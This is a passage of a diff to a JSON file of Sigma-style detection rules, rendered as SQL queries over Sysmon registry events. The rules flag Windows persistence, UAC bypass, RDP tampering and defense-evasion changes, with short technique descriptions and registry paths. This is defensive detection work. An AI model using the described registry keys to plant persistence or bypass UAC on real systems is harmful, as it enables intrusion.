telemetry collections.\nThis binary was created to be easily extensible, and to that end, it relies on the registry to instruct on which commands to run.\nThe problem is, it will run any arbitrary command without restriction of location or type.\n", + "author": "Lednyov Alexey, oscd.community, Sreeman", "tags": [ "attack.persistence", - "attack.t1137" + "attack.t1053.005" ], "falsepositives": [ - "Administrative activity" + "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Office\\\\%' ESCAPE '\\' AND TargetObject LIKE '%\\\\Outlook\\\\Security\\\\%' ESCAPE '\\' AND EventType = 'SetValue')" + "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (EventType = 'SetValue' AND TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\AppCompatFlags\\\\TelemetryController\\\\%' ESCAPE '\\' AND TargetObject LIKE '%\\\\Command' ESCAPE '\\' AND (Details LIKE '%.sh%' ESCAPE '\\' OR Details LIKE '%.exe%' ESCAPE '\\' OR Details LIKE '%.dll%' ESCAPE '\\' OR Details LIKE '%.bin%' ESCAPE '\\' OR Details LIKE '%.bat%' ESCAPE '\\' OR Details LIKE '%.cmd%' ESCAPE '\\' OR Details LIKE '%.js%' ESCAPE '\\' OR Details LIKE '%.ps%' ESCAPE '\\' OR Details LIKE '%.vb%' ESCAPE '\\' OR Details LIKE '%.jar%' ESCAPE '\\' OR Details LIKE '%.hta%' ESCAPE '\\' OR Details LIKE '%.msi%' ESCAPE '\\' OR Details LIKE '%.vbs%' ESCAPE '\\')) AND NOT ((Details LIKE '%\\\\system32\\\\CompatTelRunner.exe%' ESCAPE '\\' OR Details LIKE '%\\\\system32\\\\DeviceCensus.exe%' ESCAPE '\\')))" ], - "filename": "registry_set_office_outlook_security_settings.yml" + "filename": "registry_set_telemetry_persistence.yml" }, { - "title": "Bypass UAC Using Event Viewer", - "id": "674202d0-b22a-4af4-ae5f-2eda1f3da1af", - "status": "experimental", - "description": "Bypasses User Account Control using Event Viewer and a relevant Windows Registry modification", + "title": "Bypass UAC Using SilentCleanup Task", + "id": "724ea201-6514-4f38-9739-e5973c34f49a", + "status": "test", + "description": "There is an auto-elevated task called SilentCleanup located in %windir%\\system32\\cleanmgr.exe This can be abused to elevate any file with Administrator privileges without prompting UAC", "author": "frack113", "tags": [ - "attack.persistence", - "attack.t1547.010" + "attack.privilege_escalation", + "attack.defense_evasion", + "attack.t1548.002" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (EventType = 'SetValue' AND TargetObject LIKE '%\\_Classes\\\\mscfile\\\\shell\\\\open\\\\command\\\\(Default)' ESCAPE '\\') AND NOT (Details LIKE '\\%SystemRoot\\%\\\\system32\\\\mmc.exe \"\\%1\" \\%%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetObject LIKE '%\\\\Environment\\\\windir' ESCAPE '\\' AND Details LIKE '%&REM%' ESCAPE '\\' AND EventType = 'SetValue')" ], - "filename": "registry_set_bypass_uac_using_eventviewer.yml" + "filename": "registry_set_bypass_uac_using_silentcleanup_task.yml" }, { - "title": "Potential Persistence Via Outlook Home Page", - "id": "ddd171b5-2cc6-4975-9e78-f0eccd08cc76", + "title": "Add Debugger Entry To AeDebug For Persistence", + "id": "092af964-4233-4373-b4ba-d86ea2890288", "status": "experimental", - "description": "Detects potential persistence activity via outlook home pages.", - "author": "Tobias Michalski (Nextron Systems)", + "description": "Detects when an attacker adds a new \"Debugger\" value to the \"AeDebug\" key in order to achieve persistence which will get invoked when an application crashes", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.persistence", - "attack.t1112" + "attack.persistence" ], "falsepositives": [ - "Unknown" + "Legitimate use of the key to setup a debugger. Which is often the case on developers machines" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND (TargetObject LIKE '%\\\\Software\\\\Microsoft\\\\Office\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Outlook\\\\WebView\\\\%' ESCAPE '\\') AND TargetObject LIKE '%\\\\URL' ESCAPE '\\' AND (TargetObject LIKE '%\\\\Calendar\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Inbox\\\\%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (EventType = 'SetValue' AND TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\AeDebug\\\\Debugger%' ESCAPE '\\' AND Details LIKE '%.dll' ESCAPE '\\') AND NOT (Details LIKE '\"C:\\\\WINDOWS\\\\system32\\\\vsjitdebugger.exe\" -p \\%ld -e \\%ld -j 0x\\%p' ESCAPE '\\'))" ], - "filename": "registry_set_persistence_outlook_homepage.yml" + "filename": "registry_set_aedebug_persistence.yml" }, { - "title": "Modify User Shell Folders Startup Value", - "id": "9c226817-8dc9-46c2-a58d-66655aafd7dc", + "title": "Bypass UAC Using Event Viewer", + "id": "674202d0-b22a-4af4-ae5f-2eda1f3da1af", "status": "experimental", - "description": "Detect modification of the startup key to a path where a payload could be stored to be launched during startup", + "description": "Bypasses User Account Control using Event Viewer and a relevant Windows Registry modification", "author": "frack113", "tags": [ "attack.persistence", - "attack.privilege_escalation", - "attack.t1547.001" + "attack.t1547.010" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND TargetObject LIKE '%SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Explorer\\\\User Shell Folders%' ESCAPE '\\' AND TargetObject LIKE '%Startup' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (EventType = 'SetValue' AND TargetObject LIKE '%\\_Classes\\\\mscfile\\\\shell\\\\open\\\\command\\\\(Default)' ESCAPE '\\') AND NOT (Details LIKE '\\%SystemRoot\\%\\\\system32\\\\mmc.exe \"\\%1\" \\%%' ESCAPE '\\'))" ], - "filename": "registry_set_susp_user_shell_folders.yml" + "filename": "registry_set_bypass_uac_using_eventviewer.yml" }, { - "title": "RDP Sensitive Settings Changed", - "id": "3f6b7b62-61aa-45db-96bd-9c31b36b653c", + "title": "System Scripts Autorun Keys Modification", + "id": "e7a2fd40-3ae1-4a85-bf80-15cf624fb1b1", "status": "test", - "description": "Detects tampering of RDP Terminal Service/Server sensitive settings.\nSuch as allowing unauthorized users access to a system via the 'fAllowUnsolicited' or enabling RDP via 'fDenyTSConnections'...etc\n", - "author": "Samir Bousseaden, David ANDRE, Roberto Rodriguez @Cyb3rWard0g, Nasreddine Bencherchali", + "description": "Detects modification of autostart extensibility point (ASEP) in registry.", + "author": "Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split)", "tags": [ - "attack.defense_evasion", "attack.persistence", - "attack.t1112" + "attack.t1547.001" ], "falsepositives": [ - "Some of the keys mentioned here could be modified by an administrator while setting group policy (it should be investigated either way)" + "Legitimate software automatically (mostly, during installation) sets up autorun keys for legitimate reason", + "Legitimate administrator sets up autorun keys for legitimate reason" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (((EventType = 'SetValue' AND (TargetObject LIKE '%SOFTWARE\\\\Policies\\\\Microsoft\\\\Windows NT\\\\Terminal Services\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Control\\\\Terminal Server\\\\%' ESCAPE '\\') AND TargetObject LIKE '%\\\\Shadow' ESCAPE '\\' AND Details IN ('DWORD (0x00000001)', 'DWORD (0x00000002)', 'DWORD (0x00000003)', 'DWORD (0x00000004)')) OR (EventType = 'SetValue' AND (TargetObject LIKE '%\\\\Control\\\\Terminal Server\\\\%' ESCAPE '\\' OR TargetObject LIKE '%SOFTWARE\\\\Policies\\\\Microsoft\\\\Windows NT\\\\Terminal Services\\\\%' ESCAPE '\\') AND (TargetObject LIKE '%\\\\fAllowUnsolicited' ESCAPE '\\' OR TargetObject LIKE '%\\\\fAllowUnsolicitedFullControl' ESCAPE '\\') AND Details = 'DWORD (0x00000001)')) OR (EventType = 'SetValue' AND (TargetObject LIKE '%\\\\services\\\\TermService\\\\Parameters\\\\ServiceDll%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Control\\\\Terminal Server\\\\WinStations\\\\RDP-Tcp\\\\InitialProgram%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Control\\\\Terminal Server\\\\InitialProgram%' ESCAPE '\\' OR TargetObject LIKE '%SOFTWARE\\\\Policies\\\\Microsoft\\\\Windows NT\\\\Terminal Services\\\\InitialProgram%' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (EventType = 'SetValue' AND TargetObject LIKE '%\\\\Software\\\\Policies\\\\Microsoft\\\\Windows\\\\System\\\\Scripts%' ESCAPE '\\' AND (TargetObject LIKE '%\\\\Startup%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Shutdown%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Logon%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Logoff%' ESCAPE '\\')) AND NOT (Details = '(Empty)'))" ], - "filename": "registry_set_terminal_server_tampering.yml" + "filename": "registry_set_asep_reg_keys_modification_system_scripts.yml" }, { - "title": "Potential Persistence Via COM Search Order Hijacking", - "id": "a0ff33d8-79e4-4cef-b4f3-9dc4133ccd12", + "title": "VBScript Payload Stored in Registry", + "id": "46490193-1b22-4c29-bdd6-5bf63907216f", "status": "experimental", - "description": "Detects potential COM object hijacking leveraging the COM Search Order", - "author": "Maxime Thiebaut (@0xThiebaut), oscd.community, Cédric Hien", + "description": "Detects VBScript content stored into registry keys as seen being used by UNC2452 group", + "author": "Florian Roth (Nextron Systems)", "tags": [ "attack.persistence", - "attack.t1546.015" + "attack.t1547.001" ], "falsepositives": [ - "Some installed utilities (i.e. OneDrive) may serve new COM objects at user-level" + "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (EventType = 'SetValue' AND (TargetObject LIKE 'HKCR\\\\CLSID\\\\%' ESCAPE '\\' OR TargetObject LIKE 'HKCU\\\\Software\\\\Classes\\\\CLSID\\\\%' ESCAPE '\\') AND TargetObject LIKE '%\\\\InprocServer32\\\\(Default)' ESCAPE '\\') AND NOT (((Details LIKE '%\\%\\%systemroot\\%\\%\\\\system32\\\\%' ESCAPE '\\' OR Details LIKE '%\\%\\%systemroot\\%\\%\\\\SysWow64\\\\%' ESCAPE '\\')) OR ((Details LIKE '%\\\\AppData\\\\Local\\\\Microsoft\\\\OneDrive\\\\%' ESCAPE '\\' OR Details LIKE '%\\\\FileCoAuthLib64.dll%' ESCAPE '\\' OR Details LIKE '%\\\\FileSyncShell64.dll%' ESCAPE '\\' OR Details LIKE '%\\\\FileSyncApi64.dll%' ESCAPE '\\')) OR (Image LIKE 'C:\\\\WINDOWS\\\\system32\\\\SecurityHealthService.exe' ESCAPE '\\') OR (Details LIKE '%\\\\AppData\\\\Local\\\\Microsoft\\\\TeamsMeetingAddin\\\\%' ESCAPE '\\' AND Details LIKE '%\\\\Microsoft.Teams.AddinLoader.dll%' ESCAPE '\\') OR (Details LIKE '%\\\\AppData\\\\Roaming\\\\Dropbox\\\\%' ESCAPE '\\' AND Details LIKE '%\\\\DropboxExt64.%.dll%' ESCAPE '\\') OR (Details LIKE '%TmopIEPlg.dll' ESCAPE '\\') OR ((Image LIKE 'C:\\\\WINDOWS\\\\system32\\\\wuauclt.exe' ESCAPE '\\' OR Image LIKE 'C:\\\\WINDOWS\\\\system32\\\\svchost.exe' ESCAPE '\\')) OR ((Image LIKE 'C:\\\\ProgramData\\\\Microsoft\\\\Windows Defender\\\\Platform\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files\\\\Windows Defender\\\\%' ESCAPE '\\') AND Image LIKE '%\\\\MsMpEng.exe' ESCAPE '\\') OR (Details LIKE '%\\\\FileRepository\\\\nvmdi.inf%' ESCAPE '\\') OR (Image LIKE '%\\\\MicrosoftEdgeUpdateComRegisterShell64.exe' ESCAPE '\\') OR (Image LIKE 'C:\\\\WINDOWS\\\\SYSTEM32\\\\dxdiag.exe' ESCAPE '\\') OR ((Details LIKE 'C:\\\\Windows\\\\pyshellext.amd64.dll' ESCAPE '\\' OR Details LIKE 'C:\\\\Windows\\\\pyshellext.dll' ESCAPE '\\')) OR ((Details LIKE 'C:\\\\Windows\\\\system32\\\\dnssdX.dll' ESCAPE '\\' OR Details LIKE 'C:\\\\Windows\\\\SysWOW64\\\\dnssdX.dll' ESCAPE '\\')) OR (Details LIKE 'C:\\\\Windows\\\\system32\\\\spool\\\\drivers\\\\x64\\\\3\\\\PrintConfig.dll' ESCAPE '\\') OR ((Details LIKE 'C:\\\\Program Files\\\\%' ESCAPE '\\' OR Details LIKE 'C:\\\\Program Files (x86)\\\\%' ESCAPE '\\')) OR (Details LIKE 'C:\\\\ProgramData\\\\Microsoft\\\\%' ESCAPE '\\') OR (Details LIKE '%C:\\\\WINDOWS\\\\system32\\\\GamingServicesProxy.dll%' ESCAPE '\\') OR (Image LIKE 'C:\\\\Windows\\\\System32\\\\poqexec.exe' ESCAPE '\\' AND Details LIKE '%C:\\\\Windows\\\\System32\\\\Autopilot.dll%' ESCAPE '\\') OR (Image LIKE 'C:\\\\Windows\\\\system32\\\\SecurityHealthService.exe' ESCAPE '\\' AND Details LIKE '%C:\\\\Windows\\\\System32\\\\SecurityHealth%' ESCAPE '\\') OR ((Image LIKE 'C:\\\\Windows\\\\System32\\\\poqexec.exe' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\System32\\\\regsvr32.exe' ESCAPE '\\') AND TargetObject LIKE '%\\\\InProcServer32\\\\(Default)' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (EventType = 'SetValue' AND TargetObject LIKE '%Software\\\\Microsoft\\\\Windows\\\\CurrentVersion%' ESCAPE '\\' AND (Details LIKE '%vbscript:%' ESCAPE '\\' OR Details LIKE '%jscript:%' ESCAPE '\\' OR Details LIKE '%mshtml,%' ESCAPE '\\' OR Details LIKE '%RunHTMLApplication%' ESCAPE '\\' OR Details LIKE '%Execute(%' ESCAPE '\\' OR Details LIKE '%CreateObject%' ESCAPE '\\' OR Details LIKE '%window.close%' ESCAPE '\\')) AND NOT ((TargetObject LIKE '%Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run%' ESCAPE '\\') OR (Image LIKE '%\\\\msiexec.exe' ESCAPE '\\' AND TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Installer\\\\UserData\\\\%' ESCAPE '\\' AND (Details LIKE '%\\\\Microsoft.NET\\\\Primary Interop Assemblies\\\\Microsoft.mshtml.dll%' ESCAPE '\\' OR Details LIKE '%<\\\\Microsoft.mshtml,fileVersion=%' ESCAPE '\\' OR Details LIKE '%\\_mshtml\\_dll\\_%' ESCAPE '\\' OR Details LIKE '%<\\\\Microsoft.mshtml,culture=%' ESCAPE '\\'))))" ], - "filename": "registry_set_persistence_search_order.yml" + "filename": "registry_set_vbs_payload_stored.yml" }, { - "title": "Potential Persistence Via Custom Protocol Handler", - "id": "fdbf0b9d-0182-4c43-893b-a1eaab92d085", - "status": "experimental", - "description": "Detects potential persistence activity via the registering of a new custom protocole handlers. While legitimate applications register protocole handlers often times during installation. And attacker can abuse this by setting a custom handler to be used as a persistence mechanism.", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "WinSock2 Autorun Keys Modification", + "id": "d6c2ce7e-afb5-4337-9ca4-4b5254ed0565", + "status": "test", + "description": "Detects modification of autostart extensibility point (ASEP) in registry.", + "author": "Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split)", "tags": [ - "attack.defense_evasion", - "attack.t1112" + "attack.persistence", + "attack.t1547.001" ], "falsepositives": [ - "Legitimate applications registering a new custom protocol handler" + "Legitimate software automatically (mostly, during installation) sets up autorun keys for legitimate reason", + "Legitimate administrator sets up autorun keys for legitimate reason" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (TargetObject LIKE 'HKCR\\\\%' ESCAPE '\\' AND Details LIKE 'URL:%' ESCAPE '\\') AND NOT ((Details LIKE 'URL:ms-%' ESCAPE '\\') OR ((Image LIKE 'C:\\\\Program Files\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files (x86)%' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\%' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (EventType = 'SetValue' AND TargetObject LIKE '%\\\\System\\\\CurrentControlSet\\\\Services\\\\WinSock2\\\\Parameters%' ESCAPE '\\' AND (TargetObject LIKE '%\\\\Protocol\\_Catalog9\\\\Catalog\\_Entries%' ESCAPE '\\' OR TargetObject LIKE '%\\\\NameSpace\\_Catalog5\\\\Catalog\\_Entries%' ESCAPE '\\')) AND NOT (Details = '(Empty)' OR Image LIKE 'C:\\\\Windows\\\\System32\\\\MsiExec.exe' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\syswow64\\\\MsiExec.exe' ESCAPE '\\'))" ], - "filename": "registry_set_persistence_custom_protocol_handler.yml" + "filename": "registry_set_asep_reg_keys_modification_winsock2.yml" }, { - "title": "Potential PowerShell Execution Policy Tampering", - "id": "fad91067-08c5-4d1a-8d8c-d96a21b37814", + "title": "Disabled RestrictedAdminMode For RDS", + "id": "d6ce7ebd-260b-4323-9768-a9631c8d4db2", "status": "experimental", - "description": "Detects changes to the PowerShell execution policy in order to bypass signing requirements for script execution", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detect activation of DisableRestrictedAdmin to desable RestrictedAdmin mode.\nRestrictedAdmin mode prevents the transmission of reusable credentials to the remote system to which you connect using Remote Desktop.\nThis prevents your credentials from being harvested during the initial connection process if the remote server has been compromise\n", + "author": "frack113", "tags": [ - "attack.defense_evasion" + "attack.defense_evasion", + "attack.t1112" ], "falsepositives": [ "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (EventType = 'SetValue' AND (TargetObject LIKE '%\\\\ShellIds\\\\Microsoft.PowerShell\\\\ExecutionPolicy' ESCAPE '\\' OR TargetObject LIKE '%\\\\Policies\\\\Microsoft\\\\Windows\\\\PowerShell\\\\ExecutionPolicy' ESCAPE '\\') AND (Details LIKE '%Bypass%' ESCAPE '\\' OR Details LIKE '%RemoteSigned%' ESCAPE '\\' OR Details LIKE '%Unrestricted%' ESCAPE '\\')) AND NOT (((Image LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\SysWOW64\\\\%' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND TargetObject LIKE '%System\\\\CurrentControlSet\\\\Control\\\\Lsa\\\\DisableRestrictedAdmin' ESCAPE '\\' AND Details = 'DWORD (0x00000001)')" ], - "filename": "registry_set_powershell_execution_policy.yml" + "filename": "registry_set_lsa_disablerestrictedadmin.yml" }, { - "title": "Potential Persistence Via LSA Extensions", - "id": "41f6531d-af6e-4c6e-918f-b946f2b85a36", + "title": "Change User Account Associated with the FAX Service", + "id": "e3fdf743-f05b-4051-990a-b66919be1743", "status": "experimental", - "description": "Detects when an attacker modifies the \"REG_MULTI_SZ\" value named \"Extensions\" to include a custom DLL to achieve persistence via lsass.\nThe \"Extensions\" list contains filenames of DLLs being automatically loaded by lsass.exe. Each DLL has its InitializeLsaExtension() method called after loading.\n", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detect change of the user account associated with the FAX service to avoid the escalation problem.", + "author": "frack113", "tags": [ - "attack.persistence" + "attack.defense_evasion", + "attack.t1112" ], "falsepositives": [ - "Unlikely" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND TargetObject LIKE '%\\\\SYSTEM\\\\CurrentControlSet\\\\Control\\\\LsaExtensionConfig\\\\LsaSrv\\\\Extensions%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND TargetObject LIKE 'HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\Fax\\\\ObjectName' ESCAPE '\\' AND NOT (Details LIKE '%NetworkService%' ESCAPE '\\'))" ], - "filename": "registry_set_persistence_lsa_extension.yml" + "filename": "registry_set_fax_change_service_user.yml" }, { - "title": "Scheduled TaskCache Change by Uncommon Program", - "id": "4720b7df-40c3-48fd-bbdf-fd4b3c464f0d", - "status": "experimental", - "description": "Monitor the creation of a new key under 'TaskCache' when a new scheduled task is registered by a process that is not svchost.exe, which is suspicious", - "author": "Syed Hasan (@syedhasan009)", + "title": "Enable Microsoft Dynamic Data Exchange", + "id": "63647769-326d-4dde-a419-b925cc0caf42", + "status": "test", + "description": "Enable Dynamic Data Exchange protocol (DDE) in all supported editions of Microsoft Word or Excel.", + "author": "frack113", "tags": [ - "attack.persistence", - "attack.t1053", - "attack.t1053.005" + "attack.execution", + "attack.t1559.002" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (EventType = 'SetValue' AND TargetObject LIKE '%SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Schedule\\\\TaskCache\\\\%' ESCAPE '\\') AND NOT (((TargetObject LIKE '%Microsoft\\\\Windows\\\\UpdateOrchestrator%' ESCAPE '\\' OR TargetObject LIKE '%Microsoft\\\\Windows\\\\SoftwareProtectionPlatform\\\\SvcRestartTask\\\\Index%' ESCAPE '\\' OR TargetObject LIKE '%Microsoft\\\\Windows\\\\Flighting\\\\OneSettings\\\\RefreshCache\\\\Index%' ESCAPE '\\')) OR (Image LIKE 'C:\\\\Windows\\\\%' ESCAPE '\\' AND Image LIKE '%\\\\TiWorker.exe' ESCAPE '\\') OR (Image LIKE 'C:\\\\WINDOWS\\\\system32\\\\svchost.exe' ESCAPE '\\') OR (Image LIKE 'C:\\\\Windows\\\\Microsoft.NET\\\\Framework%' ESCAPE '\\' AND Image LIKE '%\\\\ngen.exe' ESCAPE '\\' AND (TargetObject LIKE '%\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Schedule\\\\TaskCache\\\\Tasks\\\\{B66B135D-DA06-4FC4-95F8-7458E1D10129}%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Schedule\\\\TaskCache\\\\Tree\\\\Microsoft\\\\Windows\\\\.NET Framework\\\\.NET Framework NGEN%' ESCAPE '\\')) OR ((Image LIKE 'C:\\\\Program Files\\\\Microsoft Office\\\\root\\\\Integration\\\\Integrator.exe' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files (x86)\\\\Microsoft Office\\\\root\\\\Integration\\\\Integrator.exe' ESCAPE '\\')) OR (Image LIKE 'C:\\\\Windows\\\\System32\\\\msiexec.exe' ESCAPE '\\') OR ((Image LIKE 'C:\\\\Program Files (x86)\\\\Dropbox\\\\Update\\\\DropboxUpdate.exe' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files\\\\Dropbox\\\\Update\\\\DropboxUpdate.exe' ESCAPE '\\')) OR (Image LIKE 'C:\\\\Windows\\\\explorer.exe' ESCAPE '\\' AND TargetObject LIKE '%\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Schedule\\\\TaskCache\\\\Tree\\\\Microsoft\\\\Windows\\\\PLA\\\\Server Manager Performance Monitor\\\\%' ESCAPE '\\') OR (Image = 'System')))" + "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((EventType = 'SetValue' AND TargetObject LIKE '%\\\\Word\\\\Security\\\\AllowDDE' ESCAPE '\\' AND Details IN ('DWORD (0x00000001)', 'DWORD (0x00000002)')) OR (EventType = 'SetValue' AND (TargetObject LIKE '%\\\\Excel\\\\Security\\\\DisableDDEServerLaunch' ESCAPE '\\' OR TargetObject LIKE '%\\\\Excel\\\\Security\\\\DisableDDEServerLookup' ESCAPE '\\') AND Details = 'DWORD (0x00000000)')))" ], - "filename": "registry_set_taskcache_entry.yml" + "filename": "registry_set_office_enable_dde.yml" }, { - "title": "Suspicious New Printer Ports in Registry (CVE-2020-1048)", - "id": "7ec912f2-5175-4868-b811-ec13ad0f8567", + "title": "RDP Sensitive Settings Changed to Zero", + "id": "a2863fbc-d5cb-48d5-83fb-d976d4b1743b", "status": "test", - "description": "Detects a new and suspicious printer port creation in Registry that could be an attempt to exploit CVE-2020-1048", - "author": "EagleEye Team, Florian Roth (Nextron Systems), NVISO", + "description": "Detects tampering of RDP Terminal Service/Server sensitive settings.\nSuch as allowing unauthorized users access to a system via the 'fAllowUnsolicited' or enabling RDP via 'fDenyTSConnections', etc.\n", + "author": "Samir Bousseaden, David ANDRE, Roberto Rodriguez @Cyb3rWard0g, Nasreddine Bencherchali", "tags": [ - "attack.persistence", - "attack.execution", "attack.defense_evasion", + "attack.persistence", "attack.t1112" ], "falsepositives": [ - "New printer port install on host" + "Some of the keys mentioned here could be modified by an administrator while setting group policy (it should be investigated either way)" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND TargetObject LIKE 'HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Ports%' ESCAPE '\\' AND (Details LIKE '%.dll%' ESCAPE '\\' OR Details LIKE '%.exe%' ESCAPE '\\' OR Details LIKE '%.bat%' ESCAPE '\\' OR Details LIKE '%.com%' ESCAPE '\\' OR Details LIKE '%C:%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (TargetObject LIKE '%\\\\fDenyTSConnections' ESCAPE '\\' OR TargetObject LIKE '%\\\\fSingleSessionPerUser' ESCAPE '\\' OR TargetObject LIKE '%\\\\UserAuthentication' ESCAPE '\\') AND Details = 'DWORD (0x00000000)')" ], - "filename": "registry_set_cve_2020_1048_new_printer_port.yml" + "filename": "registry_set_terminal_server_suspicious.yml" }, { - "title": "Persistence Via Hhctrl.ocx", - "id": "f10ed525-97fe-4fed-be7c-2feecca941b1", + "title": "Winget Admin Settings Modification", + "id": "6db5eaf9-88f7-4ed9-af7d-9ef2ad12f236", "status": "experimental", - "description": "Detects when an attacker modifies the registry value of the \"hhctrl\" to point to a custom binary", + "description": "Detects changes to the AppInstaller (winget) admin settings. Such as enabling local manifest installations or disabling installer hash checks", "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ + "attack.defense_evasion", "attack.persistence" ], "falsepositives": [ - "Unlikely" + "The event doesn't contain information about the type of change. False positives are expected with legitimate changes" ], - "level": "high", + "level": "low", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (EventType = 'SetValue' AND TargetObject LIKE '%\\\\CLSID\\\\{52A2AAAE-085D-4187-97EA-8C30DB990436}\\\\InprocServer32\\\\(Default)%' ESCAPE '\\') AND NOT (Details LIKE 'C:\\\\Windows\\\\System32\\\\hhctrl.ocx' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND Image LIKE '%\\\\winget.exe' ESCAPE '\\' AND TargetObject LIKE '\\\\REGISTRY\\\\A\\\\%' ESCAPE '\\' AND TargetObject LIKE '%\\\\LocalState\\\\admin\\_settings' ESCAPE '\\')" ], - "filename": "registry_set_hhctrl_persistence.yml" + "filename": "registry_set_winget_admin_settings_tampering.yml" }, { - "title": "Suspicious Keyboard Layout Load", - "id": "34aa0252-6039-40ff-951f-939fd6ce47d8", - "status": "test", - "description": "Detects the keyboard preload installation with a suspicious keyboard layout, e.g. Chinese, Iranian or Vietnamese layout load in user session on systems maintained by US staff only", - "author": "Florian Roth (Nextron Systems)", + "title": "Potential Signing Bypass Via Windows Developer Features - Registry", + "id": "b110ebaf-697f-4da1-afd5-b536fa27a2c1", + "status": "experimental", + "description": "Detects when the enablement of developer features such as \"Developer Mode\" or \"Application Sideloading\". Which allows the 